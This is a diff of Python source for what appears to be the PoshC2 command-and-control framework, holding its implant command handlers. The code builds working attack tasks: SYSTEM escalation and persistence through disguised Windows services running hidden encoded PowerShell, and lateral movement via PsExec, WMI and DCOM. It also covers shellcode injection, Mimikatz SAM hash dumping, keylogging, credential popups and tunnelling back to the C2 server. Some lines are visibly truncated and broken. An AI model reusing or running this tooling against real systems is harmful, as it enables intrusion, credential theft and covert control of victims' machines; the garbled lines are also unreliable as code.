new_task("get-processlist", user, randomuri)
elif (command.lower() == "hashdump") or (command.lower() == "hashdump "):
check_module_loaded("Invoke-Mimikatz.ps1", randomuri, user)
new_task("Invoke-Mimikatz -Command '\"lsadump::sam\"'", user, randomuri)
elif (command.lower() == "sharpsocks") or (command.lower() == "sharpsocks "):
check_module_loaded("SharpSocks.ps1", randomuri, user)
import string
from random import choice
allchar = string.ascii_letters
channel = "".join(choice(allchar) for x in range(25))
sharpkey = gen_key()
sharpurls = get_sharpurls()
sharpurl = select_item("HostnameIP", "C2Server")
new_task("Sharpsocks -Client -Uri %s -Channel %s -Key %s -URLs %s -Insecure -Beacon 2000" % (sharpurl,channel,sharpkey,sharpurls), user, randomuri)
print ("git clone")
print ("SharpSocksServerTestApp.exe -c %s -k %s -l http://IPADDRESS:8080" % (channel,sharpkey))
elif (command.lower() == "history") or command.lower() == "history ":
startup(user, get_history())
elif "reversedns" in command.lower():
params = re.compile("reversedns ", re.IGNORECASE)
params = params.sub("", command)
new_task("[System.Net.Dns]::GetHostEntry(\"%s\")" % params, user, randomuri)
elif "createdaisypayload" in command.lower():
elif "createproxypayload" in command.lower():
elif "createnewpayload" in command.lower():
if command:
new_task(command, user, randomuri)
handle_ps_command(command, user, randomuri, startup, createdaisypayload, createproxypayload)
def commandloop(implant_id, user):

486 Normal file
View File

@ -0,0 +1,486 @@
import base64, re, traceback, os, sys
from Alias import ps_alias
from Colours import Colours
from Utils import randomuri, validate_sleep_time
from DB import new_task, update_sleep, get_history, select_item, update_label, unhide_implant, update_item, kill_implant, get_implantbyid, get_implantdetails, get_pid, get_c2server_all, get_newimplanturl, get_allurls, get_sharpurls, new_urldetails
from AutoLoads import check_module_loaded, run_autoloads
from Help import COMMANDS, posh_help, posh_help1, posh_help2, posh_help3, posh_help4, posh_help5, posh_help6, posh_help7, posh_help8
from Config import ModulesDirectory, PayloadsDirectory, POSHDIR, ROOTDIR
from Core import readfile_with_completion, filecomplete
from Opsec import ps_opsec
from Payloads import Payloads
from Utils import argp, load_file, gen_key
from TabComplete import readline, tabCompleter
def handle_ps_command(command, user, randomuri, startup, createdaisypayload, createproxypayload):
check_module_loaded("Stage2-Core.ps1", randomuri, user)
except Exception as e:
print ("Error loading Stage2-Core.ps1: %s" % e)
run_autoloads(command, randomuri, user)
# alias mapping
for alias in ps_alias:
if alias[0] == command.lower()[:len(command.rstrip())]:
command = alias[1]
# opsec failures
for opsec in ps_opsec:
if opsec == command.lower()[:len(opsec)]:
print (Colours.RED)
print ("**OPSEC Warning**")
impid = get_implantdetails(randomuri)
ri = raw_input("Do you want to continue running - %s? (y/N) " % command)
if ri.lower() == "n":
command = ""
if ri == "":
command = ""
if ri.lower() == "y":
command = command
if ('beacon' in command.lower() and '-beacon' not in command.lower()) or 'set-beacon' in command.lower() or 'setbeacon' in command.lower():
new_sleep = command.replace('set-beacon ', '')
new_sleep = new_sleep.replace('setbeacon ', '')
new_sleep = new_sleep.replace('beacon ', '')
if not validate_sleep_time(new_sleep):
print("Invalid sleep command, please specify a time such as 50s, 10m or 1h")
new_task(command, user, randomuri)
update_sleep(new_sleep, randomuri)
elif (command.lower().startswith('label-implant')):
label = command.replace('label-implant ', '')
update_label(label, randomuri)
elif "searchhelp" in command.lower():
searchterm = (command.lower()).replace("searchhelp ","")
import string
helpful = string.split(posh_help, '\n')
for line in helpful:
if searchterm in line.lower():
print (line)
elif (command == "back") or (command == "clear") or (command == "back ") or (command == "clear "):
elif "install-servicelevel-persistencewithproxy" in command.lower():
C2 = get_c2server_all()
if C2[11] == "":
startup(user, "Need to run createproxypayload first")
newPayload = Payloads(C2[5], C2[2], C2[1], C2[3], C2[8], C2[12],
C2[13], C2[11], "", "", C2[19], C2[20],
C2[21], "%s?p" % get_newimplanturl(), PayloadsDirectory)
payload = newPayload.CreateRawBase()
cmd = "sc.exe create CPUpdater binpath= 'cmd /c powershell -exec bypass -Noninteractive -windowstyle hidden -e %s' Displayname= CheckpointServiceUpdater start= auto" % (payload)
new_task(cmd, user, randomuri)
elif "install-servicelevel-persistence" in command.lower():
C2 = get_c2server_all()
newPayload = Payloads(C2[5], C2[2], C2[1], C2[3], C2[8], "",
"", "", "", "", C2[19], C2[20],
C2[21], get_newimplanturl(), PayloadsDirectory)
payload = newPayload.CreateRawBase()
cmd = "sc.exe create CPUpdater binpath= 'cmd /c powershell -exec bypass -Noninteractive -windowstyle hidden -e %s' Displayname= CheckpointServiceUpdater start= auto" % (payload)
new_task(cmd, user, randomuri)
elif "remove-servicelevel-persistence" in command.lower():
new_task("sc.exe delete CPUpdater", user, randomuri)
# psexec lateral movement
elif "get-implantworkingdirectory" in command.lower():
new_task("pwd", user, randomuri)
elif "get-system-withproxy" in command.lower():
C2 = get_c2server_all()
if C2[11] == "":
startup(user, "Need to run createproxypayload first")
newPayload = Payloads(C2[5], C2[2], C2[1], C2[3], C2[8], C2[12],
C2[13], C2[11], "", "", C2[19], C2[20],
C2[21], "%s?p" % get_newimplanturl(), PayloadsDirectory)
payload = newPayload.CreateRawBase()
cmd = "sc.exe create CPUpdaterMisc binpath= 'cmd /c powershell -exec bypass -Noninteractive -windowstyle hidden -e %s' Displayname= CheckpointServiceModule start= auto" % payload
new_task(cmd, user, randomuri)
cmd = "sc.exe start CPUpdaterMisc"
new_task(cmd, user, randomuri)
cmd = "sc.exe delete CPUpdaterMisc"
new_task(cmd, user, randomuri)
elif "get-system-withdaisy" in command.lower():
C2 = get_c2server_all()
daisyname = raw_input("Payload name required: ")
if os.path.isfile(("%s%spayload.bat" % (PayloadsDirectory,daisyname))):
with open("%s%spayload.bat" % (PayloadsDirectory,daisyname), "r") as p: payload =
cmd = "sc.exe create CPUpdaterMisc binpath= 'cmd /c %s' Displayname= CheckpointServiceModule start= auto" % payload
new_task(cmd, user, randomuri)
cmd = "sc.exe start CPUpdaterMisc"
new_task(cmd, user, randomuri)
cmd = "sc.exe delete CPUpdaterMisc"
new_task(cmd, user, randomuri)
elif "get-system" in command.lower():
C2 = get_c2server_all()
newPayload = Payloads(C2[5], C2[2], C2[1], C2[3], C2[8], "",
"", "", "", "", C2[19], C2[20],
C2[21], get_newimplanturl(), PayloadsDirectory)
payload = newPayload.CreateRawBase()
cmd = "sc.exe create CPUpdaterMisc binpath= 'cmd /c powershell -exec bypass -Noninteractive -windowstyle hidden -e %s' Displayname= CheckpointServiceModule start= auto" % payload
new_task(cmd, user, randomuri)
cmd = "sc.exe start CPUpdaterMisc"
new_task(cmd, user, randomuri)
cmd = "sc.exe delete CPUpdaterMisc"
new_task(cmd, user, randomuri)
elif "quit" in command.lower():
ri = raw_input("Are you sure you want to quit? (Y/n) ")
if ri.lower() == "n":
if ri == "":
if ri.lower() == "y":
elif "invoke-psexecproxypayload" in command.lower():
check_module_loaded("Invoke-PsExec.ps1", randomuri, user)
if os.path.isfile(("%s%spayload.bat" % (PayloadsDirectory,"Proxy"))):
with open("%s%spayload.bat" % (PayloadsDirectory,"Proxy"), "r") as p: payload =
params = re.compile("invoke-psexecproxypayload ", re.IGNORECASE)
params = params.sub("", command)
cmd = "invoke-psexec %s -command \"%s\"" % (params,payload)
new_task(cmd, user, randomuri)
startup(user, "Need to run createproxypayload first")
elif "invoke-psexecdaisypayload" in command.lower():
check_module_loaded("Invoke-PsExec.ps1", randomuri, user)
daisyname = raw_input("Payload name required: ")
if os.path.isfile(("%s%spayload.bat" % (PayloadsDirectory,daisyname))):
with open("%s%spayload.bat" % (PayloadsDirectory,daisyname), "r") as p: payload =
params = re.compile("invoke-psexecdaisypayload ", re.IGNORECASE)
params = params.sub("", command)
cmd = "invoke-psexec %s -command \"%s\"" % (params,payload)
new_task(cmd, user, randomuri)
startup(user, "Need to run createdaisypayload first")
elif "invoke-psexecpayload" in command.lower():
check_module_loaded("Invoke-PsExec.ps1", randomuri, user)
C2 = get_c2server_all()
newPayload = Payloads(C2[5], C2[2], C2[1], C2[3], C2[8], "",
"", "", "", "", C2[19], C2[20],
C2[21], get_newimplanturl(), PayloadsDirectory)
payload = newPayload.CreateRawBase()
params = re.compile("invoke-psexecpayload ", re.IGNORECASE)
params = params.sub("", command)
cmd = "invoke-psexec %s -command \"powershell -exec bypass -Noninteractive -windowstyle hidden -e %s\"" % (params,payload)
new_task(cmd, user, randomuri)
# wmi lateral movement
elif "invoke-wmiproxypayload" in command.lower():
check_module_loaded("Invoke-WMIExec.ps1", randomuri, user)
if os.path.isfile(("%s%spayload.bat" % (PayloadsDirectory,"Proxy"))):
with open("%s%spayload.bat" % (PayloadsDirectory,"Proxy"), "r") as p: payload =
params = re.compile("invoke-wmiproxypayload ", re.IGNORECASE)
params = params.sub("", command)
cmd = "invoke-wmiexec %s -command \"%s\"" % (params,payload)
new_task(cmd, user, randomuri)
startup(user, "Need to run createproxypayload first")
elif "invoke-wmidaisypayload" in command.lower():
check_module_loaded("Invoke-WMIExec.ps1", randomuri, user)
daisyname = raw_input("Name required: ")
if os.path.isfile(("%s%spayload.bat" % (PayloadsDirectory,daisyname))):
with open("%s%spayload.bat" % (PayloadsDirectory,daisyname), "r") as p: payload =
params = re.compile("invoke-wmidaisypayload ", re.IGNORECASE)
params = params.sub("", command)
cmd = "invoke-wmiexec %s -command \"%s\"" % (params,payload)
new_task(cmd, user, randomuri)
startup(user, "Need to run createdaisypayload first")
elif "invoke-wmipayload" in command.lower():
check_module_loaded("Invoke-WMIExec.ps1", randomuri, user)
C2 = get_c2server_all()
newPayload = Payloads(C2[5], C2[2], C2[1], C2[3], C2[8], "",
"", "", "", "", C2[19], C2[20],
C2[21], get_newimplanturl(), PayloadsDirectory)
payload = newPayload.CreateRawBase()
params = re.compile("invoke-wmipayload ", re.IGNORECASE)
params = params.sub("", command)
cmd = "invoke-wmiexec %s -command \"powershell -exec bypass -Noninteractive -windowstyle hidden -e %s\"" % (params,payload)
new_task(cmd, user, randomuri)
# dcom lateral movement
elif "invoke-dcomproxypayload" in command.lower():
if os.path.isfile(("%s%spayload.bat" % (PayloadsDirectory,"Proxy"))):
with open("%s%spayload.bat" % (PayloadsDirectory,"Proxy"), "r") as p: payload =
params = re.compile("invoke-wmiproxypayload ", re.IGNORECASE)
params = params.sub("", command)
p = re.compile(r'(?<=-target.).*')
target =, command).group()
pscommand = "$c = [activator]::CreateInstance([type]::GetTypeFromProgID(\"MMC20.Application\",\"%s\")); $c.Document.ActiveView.ExecuteShellCommand(\"C:\Windows\System32\cmd.exe\",$null,\"/c %s\",\"7\")" % (target,payload)
new_task(pscommand, user, randomuri)
startup(user, "Need to run createproxypayload first")
elif "invoke-dcomdaisypayload" in command.lower():
daisyname = raw_input("Name required: ")
if os.path.isfile(("%s%spayload.bat" % (PayloadsDirectory,daisyname))):
with open("%s%spayload.bat" % (PayloadsDirectory,daisyname), "r") as p: payload =
p = re.compile(r'(?<=-target.).*')
target =, command).group()
pscommand = "$c = [activator]::CreateInstance([type]::GetTypeFromProgID(\"MMC20.Application\",\"%s\")); $c.Document.ActiveView.ExecuteShellCommand(\"C:\Windows\System32\cmd.exe\",$null,\"/c powershell -exec bypass -Noninteractive -windowstyle hidden -e %s\",\"7\")" % (target,payload)
new_task(pscommand, user, randomuri)
startup(user, "Need to run createdaisypayload first")
elif "invoke-dcompayload" in command.lower():
C2 = get_c2server_all()
newPayload = Payloads(C2[5], C2[2], C2[1], C2[3], C2[8], "",
"", "", "", "", C2[19], C2[20],
C2[21], get_newimplanturl(), PayloadsDirectory)
payload = newPayload.CreateRawBase()
p = re.compile(r'(?<=-target.).*')
target =, command).group()
pscommand = "$c = [activator]::CreateInstance([type]::GetTypeFromProgID(\"MMC20.Application\",\"%s\")); $c.Document.ActiveView.ExecuteShellCommand(\"C:\Windows\System32\cmd.exe\",$null,\"/c powershell -exec bypass -Noninteractive -windowstyle hidden -e %s\",\"7\")" % (target,payload)
new_task(pscommand, user, randomuri)
# runas payloads
elif "invoke-runasdaisypayload" in command.lower():
daisyname = raw_input("Name required: ")
if os.path.isfile(("%s%spayload.bat" % (PayloadsDirectory,daisyname))):
with open("%s%spayload.bat" % (PayloadsDirectory,daisyname), "r") as p: payload =
new_task("$proxypayload = \"%s\"" % payload, user, randomuri)
check_module_loaded("Invoke-RunAs.ps1", randomuri, user)
check_module_loaded("NamedPipeDaisy.ps1", randomuri, user)
params = re.compile("invoke-runasdaisypayload ", re.IGNORECASE)
params = params.sub("", command)
pipe = "add-Type -assembly System.Core; $pi = new-object System.IO.Pipes.NamedPipeClientStream('PoshMSDaisy'); $pi.Connect(); $pr = new-object System.IO.StreamReader($pi); iex $pr.ReadLine();"
pscommand = "invoke-runas %s -command C:\\Windows\\System32\\WindowsPowershell\\v1.0\\powershell.exe -Args \" -e %s\"" % (params,base64.b64encode(pipe.encode('UTF-16LE')))
new_task(pscommand, user, randomuri)
startup(user, "Need to run createdaisypayload first")
elif "invoke-runasproxypayload" in command.lower():
C2 = get_c2server_all()
if C2[11] == "":
startup(user, "Need to run createproxypayload first")
newPayload = Payloads(C2[5], C2[2], C2[1], C2[3], C2[8], C2[12],
C2[13], C2[11], "", "", C2[19], C2[20],
C2[21], "%s?p" % get_newimplanturl(), PayloadsDirectory)
payload = newPayload.CreateRawBase()
proxyvar = "$proxypayload = \"powershell -exec bypass -Noninteractive -windowstyle hidden -e %s\"" % payload
new_task(proxyvar, user, randomuri)
check_module_loaded("Invoke-RunAs.ps1", randomuri, user)
check_module_loaded("NamedPipeProxy.ps1", randomuri, user)
params = re.compile("invoke-runasproxypayload ", re.IGNORECASE)
params = params.sub("", command)
pipe = "add-Type -assembly System.Core; $pi = new-object System.IO.Pipes.NamedPipeClientStream('PoshMSProxy'); $pi.Connect(); $pr = new-object System.IO.StreamReader($pi); iex $pr.ReadLine();"
pscommand = "invoke-runas %s -command C:\\Windows\\System32\\WindowsPowershell\\v1.0\\powershell.exe -Args \" -e %s\"" % (params,base64.b64encode(pipe.encode('UTF-16LE')))
new_task(pscommand, user, randomuri)
elif "invoke-runaspayload" in command.lower():
check_module_loaded("Invoke-RunAs.ps1", randomuri, user)
check_module_loaded("NamedPipe.ps1", randomuri, user)
params = re.compile("invoke-runaspayload ", re.IGNORECASE)
params = params.sub("", command)
pipe = "add-Type -assembly System.Core; $pi = new-object System.IO.Pipes.NamedPipeClientStream('PoshMS'); $pi.Connect(); $pr = new-object System.IO.StreamReader($pi); iex $pr.ReadLine();"
pscommand = "invoke-runas %s -command C:\\Windows\\System32\\WindowsPowershell\\v1.0\\powershell.exe -Args \" -e %s\"" % (params,base64.b64encode(pipe.encode('UTF-16LE')))
new_task(pscommand, user, randomuri)
elif command.lower() == "help" or command == "?" or command.lower() == "help ":
print (posh_help)
elif command.lower() == "help 1":
print (posh_help1)
elif command.lower() == "help 2":
print (posh_help2)
elif command.lower() == "help 3":
print (posh_help3)
elif command.lower() == "help 4":
print (posh_help4)
elif command.lower() == "help 5":
print (posh_help5)
elif command.lower() == "help 6":
print (posh_help6)
elif command.lower() == "help 7":
print (posh_help7)
elif command.lower() == "help 8":
print (posh_help8)
elif "get-pid" in command.lower():
pid = get_implantdetails(randomuri)
print (pid[8])
elif "upload-file" in command.lower():
source = ""
destination = ""
s = ""
nothidden = False
if command.strip().lower() == "upload-file":
source = readfile_with_completion("Location of file to upload: ")
while not os.path.isfile(source):
print("File does not exist: %s" % source)
source = readfile_with_completion("Location of file to upload: ")
destination = raw_input("Location to upload to: ")
args = argp(command)
source = args.source
destination = args.destination
nothidden = args.nothidden
with open(source, "rb") as source_file:
s =
if s:
sourceb64 = base64.b64encode(s)
destination = destination.replace("\\","\\\\")
print ("")
print ("Uploading %s to %s" % (source, destination))
if (nothidden):
uploadcommand = "Upload-File -Destination \"%s\" -NotHidden %s -Base64 %s" % (destination, nothidden, sourceb64)
uploadcommand = "Upload-File -Destination \"%s\" -Base64 %s" % (destination, sourceb64)
new_task(uploadcommand, user, randomuri)
print("Source file could not be read or was empty")
except Exception as e:
print ("Error with source file: %s" % e )
elif "kill-implant" in command.lower() or "exit" in command.lower():
impid = get_implantdetails(randomuri)
ri = raw_input("Are you sure you want to terminate the implant ID %s? (Y/n) " % impid[0])
if ri.lower() == "n":
print ("Implant not terminated")
if ri == "":
new_task("exit", user, randomuri)
if ri.lower() == "y":
new_task("exit", user, randomuri)
elif "unhide-implant" in command.lower():
elif "hide-implant" in command.lower():
elif "migrate" in command[:7].lower():
params = re.compile("migrate", re.IGNORECASE)
params = params.sub("", command)
migrate(randomuri, user, params)
elif "loadmoduleforce" in command.lower():
params = re.compile("loadmoduleforce ", re.IGNORECASE)
params = params.sub("", command)
check_module_loaded(params, randomuri, user, force=True)
elif "loadmodule" in command.lower():
params = re.compile("loadmodule ", re.IGNORECASE)
params = params.sub("", command)
check_module_loaded(params, randomuri, user)
elif "invoke-daisychain" in command.lower():
check_module_loaded("Invoke-DaisyChain.ps1", randomuri, user)
urls = get_allurls()
new_task("%s -URLs '%s'" % (command,urls), user, randomuri)
print ("Now use createdaisypayload")
elif "inject-shellcode" in command.lower():
#elif (command.lower() == "inject-shellcode") or (command.lower() == "inject-shellcode "):
params = re.compile("inject-shellcode", re.IGNORECASE)
params = params.sub("", command)
check_module_loaded("Inject-Shellcode.ps1", randomuri, user)
path = raw_input("Location of shellcode file: ")
t = tabCompleter()
shellcodefile = load_file(path)
if shellcodefile != None:
arch = "64"
new_task("$Shellcode%s=\"%s\"" % (arch,base64.b64encode(shellcodefile)), user, randomuri)
new_task("Inject-Shellcode -Shellcode ([System.Convert]::FromBase64String($Shellcode%s))%s" % (arch, params), user, randomuri)
except Exception as e:
print ("Error loading file: %s" % e)
elif "listmodules" in command.lower():
print (os.listdir("%s/Modules/" % POSHDIR))
elif "modulesloaded" in command.lower():
ml = get_implantdetails(randomuri)
print (ml[14])
elif (command.lower() == "ps") or (command.lower() == "ps "):
new_task("get-processlist", user, randomuri)
elif (command.lower() == "hashdump") or (command.lower() == "hashdump "):
check_module_loaded("Invoke-Mimikatz.ps1", randomuri, user)
new_task("Invoke-Mimikatz -Command '\"lsadump::sam\"'", user, randomuri)
elif (command.lower() == "sharpsocks") or (command.lower() == "sharpsocks "):
check_module_loaded("SharpSocks.ps1", randomuri, user)
import string
from random import choice
allchar = string.ascii_letters
channel = "".join(choice(allchar) for x in range(25))
sharpkey = gen_key()
sharpurls = get_sharpurls()
sharpurl = select_item("HostnameIP", "C2Server")
new_task("Sharpsocks -Client -Uri %s -Channel %s -Key %s -URLs %s -Insecure -Beacon 2000" % (sharpurl,channel,sharpkey,sharpurls), user, randomuri)
print ("git clone")
print ("SharpSocksServerTestApp.exe -c %s -k %s -l http://IPADDRESS:8080" % (channel,sharpkey))
elif (command.lower() == "history") or command.lower() == "history ":
startup(user, get_history())
elif "reversedns" in command.lower():
params = re.compile("reversedns ", re.IGNORECASE)
params = params.sub("", command)
new_task("[System.Net.Dns]::GetHostEntry(\"%s\")" % params, user, randomuri)
elif "createdaisypayload" in command.lower():
createdaisypayload(user, startup)
elif "createproxypayload" in command.lower():
createproxypayload(user, startup)
elif "createnewpayload" in command.lower():
createproxypayload(user, startup)
if command:
new_task(command, user, randomuri)
def migrate(randomuri, user, params=""):
implant = get_implantdetails(randomuri)
implant_arch = implant[10]
implant_comms = implant[15]
if implant_arch == "AMD64":
arch = "64"
arch = "86"
if implant_comms == "Normal":
shellcodefile = load_file("%s/payloads/Posh-shellcode_x%s.bin" % (ROOTDIR,arch))
elif implant_comms == "Daisy":
daisyname = raw_input("Name required: ")
shellcodefile = load_file("%s/payloads/%sPosh-shellcode_x%s.bin" % (ROOTDIR,daisyname,arch))
elif implant_comms == "Proxy":
shellcodefile = load_file("%s/payloads/ProxyPosh-shellcode_x%s.bin" % (ROOTDIR,arch))
check_module_loaded("Inject-Shellcode.ps1", randomuri, user)
new_task("$Shellcode%s=\"%s\"" % (arch,base64.b64encode(shellcodefile)), user, randomuri)
new_task("Inject-Shellcode -Shellcode ([System.Convert]::FromBase64String($Shellcode%s))%s" % (arch, params), user, randomuri)

128 Normal file
View File

@ -0,0 +1,128 @@
import base64, re, traceback, os
from Alias import py_alias
from Colours import Colours
from Utils import randomuri, validate_sleep_time
from DB import new_task, update_sleep, update_label, unhide_implant, kill_implant, get_implantdetails, get_pid
from AutoLoads import check_module_loaded
from Help import py_help1
from Config import ModulesDirectory
from Core import readfile_with_completion
from Utils import argp
def handle_py_command(command, user, randomuri, startup):
# alias mapping
for alias in py_alias:
if alias[0] == command.lower()[:len(command.rstrip())]:
command = alias[1]
if 'beacon' in command.lower() or 'set-beacon' in command.lower() or 'setbeacon' in command.lower():
new_sleep = command.replace('set-beacon ', '')
new_sleep = new_sleep.replace('setbeacon ', '')
new_sleep = new_sleep.replace('beacon ', '')
if not validate_sleep_time(new_sleep):
print("Invalid sleep command, please specify a time such as 50s, 10m or 1h")
command = '$sleeptime = %s' % new_sleep
new_task(command, user, randomuri)
update_sleep(new_sleep, randomuri)
elif (command.lower().startswith('label-implant')):
label = command.replace('label-implant ', '')
update_label(label, randomuri)
elif "searchhelp" in command.lower():
searchterm = (command.lower()).replace("searchhelp ","")
import string
helpful = string.split(py_help1, '\n')
for line in helpful:
if searchterm in line.lower():
print (line)
elif "unhide-implant" in command.lower():
elif "hide-implant" in command.lower():
elif command.lower() == 'sai' or command.lower() == 'sai ':
new_task('startanotherimplant', user, randomuri)
elif "upload-file" in command.lower():
source = ""
destination = ""
s = ""
if command.strip().lower() == "upload-file":
source = readfile_with_completion("Location of file to upload: ")
while not os.path.isfile(source):
print("File does not exist: %s" % source)
source = readfile_with_completion("Location of file to upload: ")
destination = raw_input("Location to upload to: ")
args = argp(command)
source = args.source
destination = args.destination
with open(source, "rb") as source_file:
s =
if s:
sourceb64 = base64.b64encode(s)
destination = destination.replace("\\","\\\\")
print ("")
print ("Uploading %s to %s" % (source, destination))
uploadcommand = "upload-file \"%s\":%s" % (destination, sourceb64)
new_task(uploadcommand, user, randomuri)
print("Source file could not be read or was empty")
except Exception as e:
print ("Error with source file: %s" % e )
elif command.lower() == "help" or command == "?" or command.lower() == "help ":
print (py_help1)
elif "loadmoduleforce" in command.lower():
params = re.compile("loadmoduleforce ", re.IGNORECASE)
params = params.sub("", command)
check_module_loaded(params, randomuri, user, force=True)
elif "loadmodule" in command.lower():
params = re.compile("loadmodule ", re.IGNORECASE)
params = params.sub("", command)
check_module_loaded(params, randomuri, user)
elif 'get-screenshot' in command.lower():
taskcmd = "screencapture -x /tmp/s;base64 /tmp/s;rm /tmp/s"
new_task(taskcmd, user, randomuri)
elif "kill-implant" in command.lower() or "exit" in command.lower():
impid = get_implantdetails(randomuri)
ri = raw_input("Are you sure you want to terminate the implant ID %s? (Y/n) " % impid[0])
if ri.lower() == "n":
print ("Implant not terminated")
if ri == "":
pid = get_pid(randomuri)
new_task("kill -9 %s" % pid, user, randomuri)
if ri.lower() == "y":
pid = get_pid(randomuri)
new_task("kill -9 %s" % pid, user, randomuri)
elif (command == "back") or (command == "clear") or (command == "back ") or (command == "clear "):
elif "linuxprivchecker" in command.lower():
params = re.compile("linuxprivchecker", re.IGNORECASE)
params = params.sub("", command)
module = open("" % ModulesDirectory, 'r').read()
encoded_module = base64.b64encode(module)
taskcmd = "linuxprivchecker -pycode %s %s" % (encoded_module, params)
new_task(taskcmd, user, randomuri)
if command:
new_task(command, user, randomuri)

206 Normal file
View File

@ -0,0 +1,206 @@
import base64, re, traceback, os
from Alias import cs_alias
from Colours import Colours
from Utils import randomuri, validate_sleep_time
from DB import new_task, update_sleep, update_label, unhide_implant, kill_implant, get_implantdetails, get_pid
from AutoLoads import check_module_loaded
from Help import sharp_help1
from Config import ModulesDirectory, POSHDIR
from Core import readfile_with_completion
from Utils import argp, load_file
def handle_sharp_command(command, user, randomuri, startup):
check_module_loaded("Stage2-Core.exe", randomuri, user)
except Exception as e:
print ("Error loading Stage2-Core.exe: %s" % e)
# alias mapping
for alias in cs_alias:
if alias[0] == command.lower()[:len(command.rstrip())]:
command = alias[1]
if "searchhelp" in command.lower():
searchterm = (command.lower()).replace("searchhelp ","")
import string
helpful = string.split(sharp_help1, '\n')
for line in helpful:
if searchterm in line.lower():
print (line)
elif "upload-file" in command.lower():
source = ""
destination = ""
s = ""
if command.strip().lower() == "upload-file":
source = readfile_with_completion("Location of file to upload: ")
while not os.path.isfile(source):
print("File does not exist: %s" % source)
source = readfile_with_completion("Location of file to upload: ")
destination = raw_input("Location to upload to: ")
args = argp(command)
source = args.source
destination = args.destination
with open(source, "rb") as source_file:
s =
if s:
sourceb64 = base64.b64encode(s)
destination = destination.replace("\\","\\\\")
print ("")
print ("Uploading %s to %s" % (source, destination))
uploadcommand = "upload-file%s;\"%s\"" % (sourceb64, destination)
new_task(uploadcommand, user, randomuri)
print("Source file could not be read or was empty")
except Exception as e:
print ("Error with source file: %s" % e )
elif "unhide-implant" in command.lower():
elif "hide-implant" in command.lower():
elif "safetydump" in command.lower():
check_module_loaded("SafetyDump.exe", randomuri, user)
new_task(command, user, randomuri)
elif "inject-shellcode" in command.lower():
params = re.compile("inject-shellcode", re.IGNORECASE)
params = params.sub("", command)
path = readfile_with_completion("Location of shellcode file: ")
shellcodefile = load_file(path)
if shellcodefile != None:
arch = "64"
new_task("run-exe Core.Program Core Inject-Shellcode %s%s" % (base64.b64encode(shellcodefile),params), user, randomuri)
except Exception as e:
print ("Error loading file: %s" % e)
elif "kill-implant" in command.lower() or "exit" in command.lower():
impid = get_implantdetails(randomuri)
ri = raw_input("Are you sure you want to terminate the implant ID %s? (Y/n) " % impid[0])
if ri.lower() == "n":
print ("Implant not terminated")
if ri == "":
new_task("exit", user, randomuri)
if ri.lower() == "y":
new_task("exit",user, randomuri)
elif "seatbelt " in command.lower():
check_module_loaded("Seatbelt.exe", randomuri, user)
new_task(command, user, randomuri)
elif (command.lower().startswith("stop-keystrokes")):
new_task("run-exe Core.Program Core %s" % command, user, randomuri)
elif (command.lower().startswith("get-keystrokes")):
new_task("run-exe Core.Program Core %s" % command, user, randomuri)
elif (command.lower().startswith("get-screenshotmulti")):
new_task(command, user, randomuri)
elif (command.lower().startswith("get-screenshot")):
new_task("run-exe Core.Program Core %s" % command, user, randomuri)
elif (command.lower().startswith("arpscan")):
new_task("run-exe Core.Program Core %s" % command, user, randomuri)
elif (command.lower().startswith("testadcredential")):
new_task("run-exe Core.Program Core %s" % command, user, randomuri)
elif (command.lower().startswith("testlocalcredential")):
new_task("run-exe Core.Program Core %s" % command, user, randomuri)
elif (command.lower().startswith("turtle")):
new_task("run-exe Core.Program Core %s" % command, user, randomuri)
elif (command.lower().startswith("get-userinfo")):
new_task("run-exe Core.Program Core %s" % command, user, randomuri)
elif (command.lower().startswith("get-content")):
new_task("run-exe Core.Program Core %s" % command, user, randomuri)
elif (command.lower().startswith("resolvednsname")):
new_task("run-exe Core.Program Core %s" % command, user, randomuri)
elif (command.lower().startswith("resolveip")):
new_task("run-exe Core.Program Core %s" % command, user, randomuri)
elif (command.lower().startswith("cred-popper")):
new_task("run-exe Core.Program Core %s" % command, user, randomuri)
elif (command.lower().startswith("get-serviceperms")):
new_task("run-exe Core.Program Core %s" % command, user, randomuri)
elif (command.lower().startswith("move")):
new_task("run-exe Core.Program Core %s" % command, user, randomuri)
elif (command.lower().startswith("delete")):
new_task("run-exe Core.Program Core %s" % command, user, randomuri)
elif (command.lower().startswith("ls")):
new_task("run-exe Core.Program Core %s" % command, user, randomuri)
elif (command.lower() == "pwd") or (command.lower() == "pwd "):
new_task("run-exe Core.Program Core pwd", user, randomuri)
elif (command.lower() == "ps") or (command.lower() == "ps "):
new_task("run-exe Core.Program Core Get-ProcessList", user, randomuri)
elif "loadmoduleforce" in command.lower():
params = re.compile("loadmoduleforce ", re.IGNORECASE)
params = params.sub("", command)
check_module_loaded(params, randomuri, user, force=True)
elif "loadmodule" in command.lower():
params = re.compile("loadmodule ", re.IGNORECASE)
params = params.sub("", command)
check_module_loaded(params, randomuri, user)
elif "listmodules" in command.lower():
modules = os.listdir("%s/Modules/" % POSHDIR)
print ("")
print ("[+] Available modules:")
print ("")
for mod in modules:
if (".exe" in mod) or (".dll" in mod) :
print (mod)
new_task(command, user, randomuri)
elif "modulesloaded" in command.lower():
ml = get_implantdetails(randomuri)
print (ml[14])
elif command.lower() == "help" or command == "?" or command.lower() == "help ":
print (sharp_help1)
elif (command == "back") or (command == "clear") or (command == "back ") or (command == "clear "):
elif ('beacon' in command.lower() and '-beacon' not in command.lower()) or 'set-beacon' in command.lower() or 'setbeacon' in command.lower():
new_sleep = command.replace('set-beacon ', '')
new_sleep = new_sleep.replace('setbeacon ', '')
new_sleep = new_sleep.replace('beacon ', '')
if not validate_sleep_time(new_sleep):
print("Invalid sleep command, please specify a time such as 50s, 10m or 1h")
new_task(command, user, randomuri)
update_sleep(new_sleep, randomuri)
elif (command.lower().startswith('label-implant')):
label = command.replace('label-implant ', '')
update_label(label, randomuri)
if command:
new_task(command, user, randomuri)

View File

@ -1,4 +1,4 @@
import os, base64, string, random, re
import os, base64, string, random, re, argparse, shlex
validate_sleep_regex = re.compile("^[0-9]*[smh]$")
@ -38,3 +38,29 @@ def randomuri(size = 15, chars=string.ascii_letters + string.digits):
def validate_sleep_time(sleeptime):
sleeptime = sleeptime.strip()
return validate_sleep_regex.match(sleeptime)
def argp(cmd):
args = ""
parser = argparse.ArgumentParser(add_help=False)
parser.add_argument('-Help', '-help', '-h', action='store', dest='help', required=False)
parser.add_argument('-Source', '-source', action='store', dest='source', required=True)
parser.add_argument('-Destination', '-destination', action='store', dest='destination', required=True)
parser.add_argument('-NotHidden', '-nothidden', action='store', dest='nothidden', required=False)
args, unknown = parser.parse_known_args(shlex.split(cmd))
return args
def load_file( location ):
fr = None
file = open((location), "rb")
fr =
